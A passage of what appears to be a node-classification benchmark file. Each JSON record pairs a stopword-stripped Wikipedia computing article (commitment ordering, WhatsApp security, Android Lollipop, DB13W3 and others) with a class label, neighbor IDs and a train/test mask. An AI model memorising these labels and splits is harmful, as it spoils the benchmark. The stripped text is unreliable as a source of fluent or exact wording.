respective local conflict graph distributed algorithm guarantee global eco exists co algorithm needs unmodified atomic commitment protocol messages order guarantee global serializability database needs guarantee also conflict serializability transactions local concurrency control mechanism condition eco local serializability weaker co allows concurrency cost little complicated local algorithm however practical overhead difference co exists transactions assumed global e.g. information available transactions local eco reduces co. global transaction committed generic local database eco algorithm aborts minimal set undecided transactions neither committed aborted either local transactions global run locally cause later cycle conflict graph set aborted transactions unique contrary co optimized transaction assigned weight determined transaction importance computing resources already invested running transaction optimization carried example reduction max flow networks problem raz 1993a like co set time dependent becomes empty eventually practically almost needed implementations transaction committed set empty set optimization applicable local database concurrency control mechanism separate eco algorithm ensures local cycles eliminated unlike co implies serializability however practically also co local concurrency mechanism utilized least ensure recoverability local transactions always committed concurrently even precedence relation exists unlike co overall transactions local partial order determined local conflict graph possible temporary local cycles since cycles eliminated local serializability mechanism allows also global transactions voted committed concurrently transitively indirect preceding via conflict global transactions committed transitively preceding local transactions state analogy distributed co algorithm stronger concurrent voting condition transitively preceding transactions need committed condition guaranteeing global eco summarized similarly co global eco global cycles global conflict graph eliminated atomic commitment together local serializability i.e. database system maintains serializability locally local cycles eliminated imply global serializability cycles eliminated means database system multidatabase environment provides local serializability mechanism enforces vote ordering strategy theorem generalization co vote ordering strategy global serializability guaranteed local co needed anymore similarly co well eco voting-deadlock situation summarized follows co means also global deadlocks due data-access locking least one lock blocking voting deadlocks automatically resolved atomic commitment multi-version commitment ordering mvco raz 1993b generalization co databases multi-version resources resources read-only transactions block blocked better performance utilizing resources common way nowadays increase concurrency performance generating new version database object time object written allowing transactions read operations several last relevant versions object mvco implies one-copy-serializability 1ser 1sr generalization serializability multi-version resources like co mvco non-blocking combined relevant multi-version concurrency control mechanism without interfering introduced underlying theory mvco conflicts generalized different versions resource differently earlier multi-version theories different versions conflict chronological order replaced version order possibly reversed keeping usual definitions conflicting operations results regular augmented conflict graphs remain unchanged similarly co distributed mvco enforcing algorithm exists mixed environment single-version multi-version resources single-version special case multi-version co mvco algorithm needs unmodified atomic commitment protocol messages additional communication overhead locking-based global deadlocks translate voting deadlocks resolved automatically analogy co following holds mvco generalized employ generalization eco mveco co based snapshot isolation cosi intersection snapshot isolation si mvco si multiversion concurrency control method widely utilized due good performance similarity serializability 1ser several aspects theory raz 1993b mvco described utilized later fekete et al 2005 articles si e.g. cahill et al 2008 see also making snapshot isolation serializable references analyzing conflicts si order make serializable method presented cahill et al 2008 serializable snapshot isolation serializablesi low overhead modification si provides good performance results versus si small penalty enforcing serializability different method combining si mvco cosi makes si serializable well relatively low overhead similarly combining generic co algorithm single-version mechanisms furthermore resulting combination cosi mvco compliant allows cosi compliant database systems inter-operate transparently participate co solution distributed/global serializability see besides overheads also protocols behaviors need compared quantitatively one hand serializable si schedules made mvco cosi possible commit delays needed without aborting transactions hand serializablesi known unnecessarily abort restart certain percentages transactions also serializable si schedules co variants e.g. ss2pl sco oco eco mvco global serializability achieved via atomic commitment protocol based distributed algorithms co variants atomic commitment protocol instrument eliminate global cycles cycles span two databases global augmented thus also regular conflict graph implicitly global data structure implementation needed cases either incompatible local commitment orders two databases global partial order embed respective local partial orders together data-access locking related voting deadlock implying global cycle global augmented conflict graph missing votes atomic commitment protocol breaks cycle aborting undecided transaction see distributed co algorithm differences various variants exist local level within participating database systems local co instance variant role determine position every global transaction transaction spans two databases within local commitment order i.e. determine transaction turn voted locally atomic commitment protocol thus co variants exhibit behavior regard atomic commitment means interoperable via atomic commitment using software interfaces typically provided services already standardized atomic commitment primarily two phase commit protocol e.g. x/open xa transparently utilized together distributed environment co variant instance possibly associated relevant local concurrency control mechanism type summary single global transaction participate simultaneously databases may employ possibly different co variant concurrently running processes database running concurrently local global transactions database atomic commitment protocol indifferent co distinguish various co variants global cycle generated augmented global conflict graph may span databases different co variants generate broken local abort voting deadlock resolved atomic commitment exactly way single co variant environment local cycles possibly mixed materialized non-materialized conflicts serializability data-access-locking deadlock related e.g. sco resolved locally respective variant instance local mechanisms vote ordering vo generalized co gco raz 2009 union co variants useful concept global serializability technique comply vo local serializability general form commutativity based including multi-versioning vote order strategy voting local precedence order needed combining results co variants following concluded",
    "neighbors": [
      9224,
      3725,
      8979,
      7446,
      5658,
      7581,
      10675,
      1083,
      9663,
      5441,
      5956,
      3398,
      4817,
      2901,
      10201,
      4194,
      1636,
      11620,
      1382,
      9069,
      11377,
      7802,
      3326
    ],
    "mask": "Test"
  },
  {
    "node_id": 7582,
    "label": 1,
    "text": "Domain_relational_calculus:domain relational calculus computer science domain relational calculus drc calculus introduced michel lacroix alain pirotte declarative database query language relational data model drc queries form x either domain variable constant formula_2 denotes drc formula result query set tuples x x make drc formula true language uses operators tuple calculus logical connectives ∧ ∨ ¬ existential quantifier ∃ universal quantifier ∀ used bind variables computational expressiveness equivalent relational algebra let b c mean rank name id enterprise relation let e f mean name deptname id department relation find captains starship uss enterprise formula_3 example b c denotes result set set table enterprise find names enterprise crew members stellar cartography formula_4 example 're looking name b condition f c requirement need find enterprise crew members stellar cartography department alternate representation previous example would formula_5 example value requested f domain directly placed formula c domain variable re-used query existence department since already holds crew member id",
    "neighbors": [
      4065,
      4066,
      4263,
      9397,
      987
    ],
    "mask": "Train"
  },
  {
    "node_id": 7583,
    "label": 4,
    "text": "Reboot_Restore_Rx:reboot restore rx reboot restore rx horizon data sys freeware application microsoft windows acts alternative windows steadystate allows users restore computer back established baseline helps prevent long term damage computer operating system os upon installation administrator reboot restore rx establish baseline baseline point computer return upon reboot administrator allowed update baseline done tray icon program program operates outside windows master boot record mbr protects mbr also allows user boot windows even windows otherwise unbootable whether software change blue screen death alternative windows steadystate reboot restore rx works maintain computer constant state alternatives including faronic deep freeze toolwiz time machine reboot restore rx pro formerly drive vaccine rollback rx latter two developed developer reboot restore rx horizon data sys reboot restore rx received generally favourable reviews received many awards review techrepublic said looking make -accessible pc junk proof consistently reliable reboot restore rx definitely nice product consider preserving peace freeware release might nearly customizable microsoft steadystate time least system thank allowing condition deteriorate rapidly abuse review product lifehacker wrote nothing worse rebooting computer thinking everything fine find something busted need troubleshoot especially bad start problems driver update series windows updates 're stuck trying figure thing caused problem first place reboot restore rx takes hassle app even restore windows wo n't boot reboot restore rx award best new product 31st annual tech learning awards",
    "neighbors": [
      700,
      925,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7584,
    "label": 2,
    "text": "Greg_Kroah-Hartman:greg kroah-hartman greg kroah-hartman gkh major linux kernel developer linux kernel maintainer codice_1 branch staging subsystem usb driver core debugfs kref kobject sysfs kernel subsystems userspace i/o hans j. koch tty layer also created linux-hotplug udev project linux driver project worked novell suse labs division works linux foundation co-author linux device drivers 3rd edition author linux kernel nutshell used contributing editor linux journal also contributes articles lwn.net computing news site kroah-hartman frequently helps documentation kernel driver development talks tutorials 2006 released cd image material introduce programmer working linux device driver development kroah-hartman strong advocate stable kernel–user space api i.e advocate stable kernel interface/binary kernel interface general user space programs also initiated development opensuse tumbleweed bleeding-edge rolling release model edition opensuse",
    "neighbors": [
      1026,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      6691,
      6180,
      6694,
      8242,
      9266,
      2109,
      6213,
      10822,
      8263,
      8268,
      589,
      4177,
      8787,
      5222,
      10856,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      1694,
      6302,
      8354,
      2723,
      8364,
      1717,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      3791,
      6352,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      4367,
      792,
      7450,
      10016,
      802,
      6947,
      5410,
      295,
      5931,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      7540,
      11643,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      9621,
      3478,
      1431,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      10687,
      457,
      9696,
      2529,
      6625,
      11232,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 7585,
    "label": 0,
    "text": "Pheme_(project):pheme project pheme 36-month research project establishing veracity claims made internet unverified content dominant prolific social media messages big data typically presents challenges information volume variety velocity social media presents fourth establishing veracity pheme project aims analyse content real time determine accurate claims made claims propagate social network individual chooses whether pass information based accurate think analysing language used spread information network well spatial temporal context information used build real-time lie detector social media help example emergency services already integrate social media part alerting response systems flag potential hoax emergencies evaluating authority sources automatically also project goal based treatment news information comes example tweet bbc news article would hold weight one unknown source project named greek goddess pheme pheme addresses social media lies two scenarios information healthcare particularly damaging wrong information used journalists pheme addresses speculation controversy misinformation disinformation project partnership university sheffield part gate university warwick king college london saarland university germany modul university vienna four companies also taking part atos ihub nairobi ontotext swissinfo pheme funded eu",
    "neighbors": [
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 7586,
    "label": 3,
    "text": "Labyrinth:_The_Computer_Game:labyrinth computer game labyrinth computer game 1986 graphic adventure game developed lucasfilm games published activision based fantasy film labyrinth tasks player navigating maze solving puzzles evading dangers player goal find defeat main antagonist jareth within 13 real-time hours unlike adventure games period labyrinth feature command-line interface instead player uses two scrolling word wheel menus screen construct basic sentences labyrinth first adventure game created lucasfilm project led designer david fox invented word wheels avoid text parsers syntax guessing typical text-based adventure games early development team collaborated author douglas adams week-long series brainstorming sessions inspired much final product labyrinth received positive reviews united states bigger commercial success film upon based design influenced lucasfilm subsequent adventure title critically acclaimed maniac mansion labyrinth computer game graphic adventure game player maneuvers character maze solving puzzles evading dangers adaptation 1986 film labyrinth many whose events characters reproduced game however follow plot film beginning player enters name sex favorite color last two fields determine appearance player character afterward short text-based adventure sequence unfolds wherein player enters movie theater watch film labyrinth game changes graphic adventure format jareth main antagonist appears projection screen transports protagonist labyrinthine prison player goal locate destroy jareth within 13 real-time hours otherwise protagonist trapped maze forever traveling maze player passes series scrolling hallways contain doors enemies things radar bar screen allows player see hallway miniature form locations doorways items characters given hallway displayed unlike adventure games period labyrinth feature command-line interface instead typing commands player selects two scrolling word wheels one verbs one nouns example verb congratulate may selected one wheel noun jareth inputs command congratulate jareth based player items location available verbs nouns change context-sensitively lucasfilm games began design labyrinth computer game 1985 company head george lucas requested tie-in video game movie name production lucasfilm common lucasfilm games projects lucas provided little direction team labyrinth first licensed game developed company earlier products rescue fractalus eidolon original intellectual properties according project leader david fox working license frees ways restricts adaptation team pressured reuse events characters labyrinth film felt obligated follow source material saw film adventure story chose set adaptation adventure game genre however fox disliked genre then-reliance text parsers syntax guessing created word wheel menus replacement meant supply limited set words still let lot things order streamline game without hampering player freedom game visual design shared lucasfilm habitat massively multiplayer online game production time early development game team screened rough cut film afterward sent london lucasfilm management one-week brainstorming session douglas adams author hitchhiker guide galaxy adams worked previously infocom development book 1984 video game adaptation also present meetings writer christopher cerf friend film director jim henson brenda laurel activision game publisher team worked extensively adams period laurel later wrote every day fresh blast wild intelligent humor stoked creativity team view pinnacle meetings adams idea opening sequence suggested reference wizard oz famous transition black-and-white color transition text-based format graphical one fox given job taking notes trip although hoped complete design emerge meetings returned london sheets sheets ideas sifted find usable concepts however material influenced game many adams suggestions used retrospectively fox felt opening sequence mistake called tedious believed alienated potential fans labyrinth released 1986 commodore 64 apple ii msx united states labyrinth commercially successful film upon based commodore magazine mark cotone lauded game puzzle design detailed graphics newcomer-friendly interface believed experienced players would enjoy depth challenging puzzles keith campbell commodore user praised animation dubbed superb game —which found unusual given status tie-in product however campbell hesitated call adventure game wrote word wheels rather tedious genre veterans roy wagner computer gaming world summarized labyrinth well done game excellent user interface writing computer video games matthew woodley praised game variety interface disliked long loading times believed small price pay brilliant game however labyrinth criticized three reviewers zzap 64 although praised visuals co-reviewer paul sumner called game slow-paced action title simplistic adventure co-reviewer julian rignall considered boring real disappointment given lucasfilm strong track record labyrinth first adventure game produced lucasfilm became critically acclaimed commercially successful developer genre game technology mechanics influenced company subsequent title maniac mansion whose scumm engine reused many lucasfilm adventure games word wheels predecessor game point-and-click interface gary winnick artist labyrinth went lead production maniac mansion ron gilbert fox contributed maniac mansion well later directed lucasfilm zak mckracken alien mindbenders retrospectively writers australian broadcasting corporation regarded labyrinth solid first attempt inferior real classics made afterward lucasfilm",
    "neighbors": [
      9006,
      707,
      11700,
      5083
    ],
    "mask": "Train"
  },
  {
    "node_id": 7587,
    "label": 1,
    "text": "International_Protein_Index:international protein index international protein index ipi defunct protein database launched 2001 european bioinformatics institute ebi closed 2011 purpose provide proteomics community resource enables last version ipi contained complete reference sets six animal species homo sapiens human mus musculus mouse rattus norvegicus rat bos taurus cattle gallus gallus chicken danio rerio zebrafish one plant species arabidopsis thaliana thale cress human mouse rat datasets first developed combining information taken swiss-prot trembl ensembl refseq databases 2001 ipi launched databases cataloguing human genes varied greatly links since much data produced giving complete picture databases collaborated synchronize data currently many model organisms reference set genes/proteins catalogued ensembl/uniprot respectively well species specific databases redundancy ipi retired 2011 ebi advised users services employ uniprotkb accession numbers protein identifiers",
    "neighbors": [
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 7588,
    "label": 1,
    "text": "ArcSDE:arcsde arcsde spatial database engine server-software sub-system produced marketed esri aims enable usage relational database management systems spatial data spatial data may used part geodatabase geographic technologies incorporated gti australia originally designed database software named spatial database engine sdbe development shifted salamanca software pvt ltd. developed first production version sdbe originally used interbase dbms president esri jack dangermond announced sde gis'95 conference vancouver british columbia esri purchased salamanca software 1996 esri rebranded software arcsde follow naming convention products arcsde grew meet need users geographic data robust multi-user editing storage access extremely large geospatial databases arcsde supports esri geodatabase implementation product began stand-alone software esri integrated arcgis version 9.2 2013 esri announced plans deprecate arcsde command line tools arcsde application server following forthcoming release arcgis 10.2. release 10.1 esri sells arcsde component arcgis server part arcgis family software products integrates geographic-information query mapping spatial analysis editing within multi-user enterprise dbms environment 2010 alternative tools connecting arcmap dbms postgres sql server.. st-links pgmap blue spatial server arcsde enables organizations move traditional approach — managing separate collections geographic data files — integrated environment one manage spatial data continuous database accessible entire organization simultaneously easily publishable web arcsde application server facilitates storing managing spatial data raster vector survey dbms makes data available many applications arcsde allows one manage spatial data four commercial databases ibm db2 informix microsoft sql server oracle starting 9.3 release esri added support open-source postgresql database arcsde serves data advanced arcgis desktop products arcview arceditor arcinfo arcgis development products arcgis engine arcgis server arcview 3.x well arcims key component managing multi-user esri-based gis traditional rdbms software keeps track tables records contained database arcsde pushes relational model higher client software manage geographic data comprise several tables seamlessly user need awareness dealings particulars rdbms gis environment routes connections database arcsde middleware manages storing retrieval data",
    "neighbors": [
      6850,
      6797,
      7983,
      119,
      11030,
      823,
      1304,
      3096,
      8122,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 7589,
    "label": 3,
    "text": "MOS_Technology_6508:mos technology 6508 mos technology 6508 8-bit microprocessor designed mos technology based popular 6502 6508 augmented two additional features internal 8-bit digital i/o port 256 bytes internal static ram internal ram mapped cpu address space 0000- 00ff 0100- 01ff serve zero page stack space i/o port available location 0001 data-direction register 0000 layout used 6510 may different strapping/bonding variants chip datasheet lists pin 40 clock phase two cbm900 computer 6508 controlling floppydisk pin 40 set overflow pin also offered 40-pin 6502 omitted 28-pin 650x variants 6503–6507 pin 6500 family cpus sets overflow flag p register tested using bvc/bvs instructions using tight polling loop 3 machine cycles constructed tighter minimum two instructions test branch loop using pin functionality",
    "neighbors": [
      11395,
      10767,
      664,
      7323,
      10784,
      4385,
      11054,
      435,
      3010,
      3157,
      6485,
      10969,
      5598,
      5862,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 7590,
    "label": 4,
    "text": "Reception_and_criticism_of_WhatsApp_security_and_privacy_features:reception criticism whatsapp security privacy features article provides detailed historic account reception criticism security privacy features whatsapp messaging service may 20 2011 unconfirmed security researcher netherlands pseudonym whatsapphack published dutch websites tweakers.net geenstijl method whatsapp accounts could hijacked researcher noticed flaw authentication process allowed researcher hijack account trying login another phone number intercepting verification sms text message specific conditions remained outbox symbian phone whatsapp client would attempt send android verification message could obtained reading radio tool named logcat researcher would copy send intercepted verification message real number phone using sms gateway spoof sender phone number number researcher tried maliciously login method worked whatsapp issued patch within one day publication articles android symbian clients whatsapp security mechanism design would disable account phone original owner phone number whatsapp account may 2011 another security hole reported left communication whatsapp susceptible packet analysis whatsapp communications encrypted data sent received plaintext meaning messages could easily read packet traces available may 2012 security researchers noticed new updates whatsapp longer sent messages plaintext cryptographic method implemented subsequently described broken august 2012 whatsapp support staff said messages encrypted latest version whatsapp software ios android blackberry windows phone symbian without specifying cryptographic method january 6 2012 unknown hacker published website made possible change status arbitrary whatsapp user long phone number known make work required restart app according hacker one many security problems whatsapp january 9 whatsapp reported resolved problem although measure actually taken block website ip address reaction windows tool made available download providing functionality problem since resolved form ip address check currently logged-in sessions german tech site h demonstrated use whatsapi hijack whatsapp account september 14 2012 shortly legal threat whatsapi developers alleged characterized h apparent reaction security reports whatsapi source code taken days whatsapi team since returned active development march 31 2013 saudi arabian communications information technology commission citc issued statement regarding possible measures whatsapp among applications unless service providers took serious steps comply monitoring privacy regulations february 2014 public authority data privacy german state schleswig-holstein advised using whatsapp service lacked privacy protection end-to-end client side encryption technology whatsapp started implementing end-to-end encryption late 2014 finished april 2016 major privacy security problem subject joint canadian-dutch government investigation primary concern whatsapp required users upload mobile phone entire address book whatsapp servers whatsapp could discover among users contacts available via whatsapp fast convenient way quickly find connect user contacts also using whatsapp meant address book mirrored whatsapp servers including contact information contacts using whatsapp information consisted solely phone numbers without additional information name contact stored hashed though salted form late 2015 dutch government released press-statement claiming whatsapp changed hashing method making much harder reverse thus fully complies rules regulations user need send friend request send messages another user due contact discovery mentioned november 2014 whatsapp introduced feature named read receipts alerts senders messages read recipients within week whatsapp introduced update allowing users disable feature message recipients send acknowledgements december 1 2014 indrajeet bhuyan saurav kar 17 years old demonstrated whatsapp message handler vulnerability allows anyone remotely crash whatsapp sending specially crafted message 2kb size escape problem user receives specially crafted message delete his/her whole conversation start fresh chat opening message keeps crashing whatsapp unless chat deleted completely early 2015 whatsapp launched web client used browser bhuyan also found two security issues compromised user privacy whatsapp photo privacy bug whatsapp web photo sync bug february 2015 dutch university student named maikel zweerink published app set prove anyone could track whatsapp user status also keep eye changing profile pictures privacy settings status messages regardless privacy settings march 2 2016 whatsapp introduced document-sharing feature initially allowing users share pdf files contacts however whatsapp default state automatically downloading attachments raised concerns press risk security support document sharing expanded beyond pdf files august 2016 whatsapp announced start sharing account information facebook consisting phone number account owner aggregated analytical data address books metadata users shared according whatsapp account information shared track basic metrics often people use services better fight spam whatsapp connecting phone number facebook systems facebook offer better friend suggestions show relevant ads account means facebook target advertisements facebook platform better making links users based phone numbers make friend suggestions users based whatsapp data user data shared advertisers used internally facebook services whatsapp emphasizes content user messages still kept private thanks end-to-end encryption means whatsapp read content chats however users given choice opt sharing data facebook advertisement purposes october 2016 article 29 working party stated serious concerns regarding manner information relating updated terms service privacy policy provided users consequently validity users ’ consent april 5 2016 end-to-end encryption users communications including file transfers voice calls supported users latest client encryption enabled default uses curve25519 key exchange hkdf generation session keys aes-256 cbc mode encryption hmac-sha256 integrity verification sha512 generating two 30 digit fingerprints users identity keys verify needed even company would unable decrypt users communications amnesty international security professionals praised move us federal bureau investigation criticised threatening work law enforcement telegram another messaging service reported bbc used islamic state extremists whatsapp messaging service provides end-to-end encryption among others threema wickr signal silent phone line also provide encryption default imessage viber provide special circumstances telegram provides end-to-end encryption opt-in feature support end-to-end encrypted group messaging whatsapp score 6 7 points electronic frontier foundation secure messaging scorecard received points communications encrypted transit communications encrypted keys provider n't access allowing users verify contacts identities past messages secure encryption keys stolen completed recent independent security audit security designs properly documented missing point code open independent review january 13 2017 guardian reported security researcher tobias boelter found whatsapp policy forcing re-encryption initially undelivered messages without informing recipient constituted serious loophole whereby whatsapp could disclose compelled disclose content messages whatsapp open whisper systems officials disagreed assessment follow-up article boelter explained greater detail considered specific vulnerability article since removed guardian due inaccuracies boelter representation facts complaints 73 renowned security researchers guardian forced substantially revise correct articles well therefore june 2017 guardian readers ’ editor paul chadwick wrote guardian wrong report january popular messaging service whatsapp security flaw serious huge threat freedom speech chadwick also noted since guardian article whatsapp better secured introduction optional two-factor verification february however important note feature already introduced public beta versions whatsapp early november 2016 months guardian wrote alleged issue january 15 2017 research team ruhr university bochum published security analysis group messaging protocols whatsapp signal threema among deficiencies found whatsapp servers effectively control membership groups consequently server add arbitrary phone numbers groups including future communication becomes insecure even though manipulations could detected weakens end-to-end security guarantees october 2017 german software company open-xchange criticised whatapps slack using proprietary software stated plans create open source alternative may 2019 revealed security vulnerability whatsapp allowing remote person install spyware making call even need answered later june 2019 another vulnerability revealed allowing user transform audio call video call without victim consent without victim noticing bug bounty 5000 usd offered bug june 2019 whatsapp announced would take legal action users send disproportionately high number messages using communication platform company reiterated platform meant private messaging businesses interact customers business app notification website company stated beginning december 7 2019 whatsapp take legal action determine engaged assisting others abuse violates terms service automated bulk messaging",
    "neighbors": [
      9440,
      2818,
      9063,
      711,
      4318,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 7591,
    "label": 3,
    "text": "Hotbit:hotbit hotbit hb-8000 msx home computer developed sold brazilian subsidiary sharp corporation epcom home computer division mid-1980s msx machines popular brazil time virtually killed competing 8 bit microcomputers brazilian market hotbit three versions 1.0 1.1 gray white case 1.2 black case rom slightly modified solve ascii table compatibility issue popular brazilian msx gradiente expert",
    "neighbors": [
      1121,
      11462,
      1194,
      780,
      3788,
      9006,
      7983,
      1776,
      4409,
      1403
    ],
    "mask": "Test"
  },
  {
    "node_id": 7592,
    "label": 8,
    "text": "Web_Application_Description_Language:web application description language web application description language wadl machine-readable xml description http-based web services wadl models resources provided service relationships wadl intended simplify reuse web services based existing http architecture web platform language independent aims promote reuse applications beyond basic use web browser wadl submitted world wide web consortium sun microsystems 31 august 2009 consortium current plans standardize wadl rest equivalent soap web services description language wsdl also used describe rest web services service described using set resource elements resource contains param elements describe inputs method elements describe request response resource request element specifies represent input types required specific http headers required response describes representation service response well fault information deal errors following listing shows example wadl description yahoo news search application multiple tools generate java code existing wadl app xmlns= http //research.sun.com/wadl/2006/10 xmlns xs= http //www.w3.org/2001/xmlschema /app",
    "neighbors": [
      9665,
      10465,
      10020,
      8070,
      8425,
      3952,
      10486,
      2106,
      3323,
      124,
      4797,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7593,
    "label": 9,
    "text": "EMSO_simulator:emso simulator emso simulator equation-oriented process simulator graphical interface modeling complex dynamic steady-state processes cape-open compliant emso stands environment modeling simulation optimization alsoc project portuguese acronym free environment simulation optimization control processes based ufrgs develops maintains distributes object-oriented software pre-built models available emso modeling library eml new models written emso modeling language user embed models coded c c++ fortran simulation environment",
    "neighbors": [
      9376,
      587,
      6797,
      7983,
      8113,
      823,
      3960,
      9431,
      9915,
      2045,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 7594,
    "label": 3,
    "text": "DB13W3:db13w3 db13w3 13w3 style d-subminiature connector commonly used analog video interfaces used primarily sun microsystems silicon graphics sgi ibm risc workstations well displays apple computer next computer intergraph corporation 13w3 connector longer used modern displays superseded use analog displays vga connector display market moved digital flat panel displays turn replaced almost entirely digital connections dvi hdmi displayport connector contains 10 standard signal pins 3 larger positions fitted either special pins two concentric contacts coaxial cable special high-current pins used video signals computer side pins female coaxial connectors large positions male coaxial connectors carry video signal split red green/gray blue standard signal pins carry four grounds three sense pins used communicate monitor vertical sync horizontal sync composite sync signal 13w3 connector converted standard vga connector using commonly available cables adapters allows multisync monitors became prevalent personal computing late 1980s used workstations long sync-on-green compatible likewise later-generation sun monitors began supporting multisync 1998 connected via similar cables personal computers even though 13w3 standard connector sync signals maintained different pins based display system sun intergraph ibm sgi use different pin configurations monitor sense id sync signals sun sgi even two different pin configurations without display data channel support sun ddc connector used least upa graphics adapters creator 3d expert 3d corresponding monitors gd5410 gd5510 make matching correct cable monitor virtually impossible many monitors 13w3 connectors support separate sync supplied pc systems converters exist allow connecting newer monitors vga connectors older systems workstations popular cable series dip switches built used set sync signals variant db13w3 connector high-current pins instead high-frequency pins used video applications also used 3com superstack ethernet switches carry dc power",
    "neighbors": [
      9057,
      9665,
      10051,
      6854,
      8007,
      10982,
      10954,
      6575,
      4567,
      11129,
      3453,
      7806,
      7647
    ],
    "mask": "Test"
  },
  {
    "node_id": 7595,
    "label": 2,
    "text": "Android_Lollipop:android lollipop android lollipop codenamed android l development fifth major version android mobile operating system developed google spanning versions 5.0 5.1.1 unveiled june 25 2014 google i/o 2014 conference became available official over-the-air ota updates november 12 2014 select devices run distributions android serviced google nexus google play edition devices source code made available november 3 2014 fifth major update twelfth version android one prominent changes lollipop release redesigned user interface built around design language known material design made retain paper-like feel interface changes include improvements notifications accessed lockscreen displayed within applications top-of-the-screen banners google also made internal changes platform android runtime art officially replacing dalvik improved application performance changes intended improve optimize battery usage statistics issued google indicate lollipop versions 14.5 share combined android devices accessing google play android lollipop succeeded android marshmallow released october 2015 release internally codenamed lemon meringue pie android 5.0 first unveiled codename android l june 25 2014 keynote presentation google i/o developers conference alongside lollipop presentation focused number new android-oriented platforms technologies including android tv in-car platform android auto wearable computing platform android wear health tracking platform google fit part presentation dedicated new cross-platform design language referred material design expanding upon card motifs first seen google design increased use grid-based layouts responsive animations transitions padding depth effects lighting shadows designer matías duarte explained unlike real paper digital material expand reform intelligently material physical surfaces edges seams shadows provide meaning touch material design language used android across google suite web software well providing consistent experience across platforms android 5.0 introduces refreshed notification system individual notifications displayed cards adhere material design language batches notifications grouped app produced notifications displayed lock screen cards heads notifications also displayed large banners across top screen along respective action buttons do-not-disturb feature also added notifications recent apps menu redesigned use three-dimensional stack cards represent open apps individual apps also display multiple cards recents menu web browser open tabs lollipop also contains major new platform features developers 5,000 new apis added use applications example possibility save photos raw image format additionally dalvik virtual machine officially replaced android runtime art new runtime environment introduced technology preview kitkat art cross-platform runtime supports x86 arm mips architectures 32-bit 64-bit environments unlike dalvik uses just-in-time compilation jit art compiles apps upon installation run exclusively compiled version technique removes processing overhead associated jit process improving system performance lollipop also aims improve battery consumption series optimizations known project volta among changes new battery saver mode job scheduling apis restrict certain tasks occur wi-fi batching tasks reduce overall amount time internal radios active new developer tool called battery historian used tracking battery consumption apps use android extension pack apis also provide graphics functions new shaders aiming provide pc-level graphics 3d games android devices number system-level enterprise-oriented features also introduced banner android work samsung knox security framework initially planned used foundation android work instead google opted use technology segregating personal work-oriented data device along accompanying apis managing environment smart lock feature devices also configured users perform device unlocking pin pattern trusted location proximity designated bluetooth device nfc tag lollipop additionally device encryption enabled default capable devices however due performance issues change held successor android marshmallow developer preview android l build lpv79 released nexus 5 2013 nexus 7 june 26 2014 form flashable images source code gpl-licensed components developer preview released via android open source project aosp july 2014 second developer preview build lpv81c released august 7 2014 alongside beta version google fit platform sdk previous build second developer preview build available nexus 5 2013 nexus 7 october 15 2014 google officially announced android l would known android 5.0 lollipop company also unveiled launch devices android5.0including motorola nexus 6 htc nexus 9for release november 3 2014 google stated nexus including nexus 4 5 7 10 google play edition devices would receive updates lollipop coming weeks one developer preview build nexus devices new sdk revision application developers would released october 17 2014 update schedules third-party android devices may vary manufacturer full source code android5.0 pushed aosp november 3 2014 allowing developers oems begin producing builds operating system december 2 2014 factory images nexus smartphones tablets updated 5.0.1 version introduces bug fixes serious bug affects nexus 4 devices prevents audio working phone calls device-specific lollipop 5.0.2 lrx22g version released first-generation nexus 7 december 19 2014 android5.1 updated version lollipop unveiled february 2015 part indonesian launch android one preloaded android one devices sold indonesia philippines google officially announced 5.1 releasing updates existing devices march 9 2015 2015 amazon.com forked lollipop produce fire os 5 bellini amazon fire hd-series devices",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      7234,
      6212,
      69,
      2630,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      11396,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9964,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      8482,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      6023,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      11680,
      8609,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      436,
      5065,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      499,
      1011,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7596,
    "label": 5,
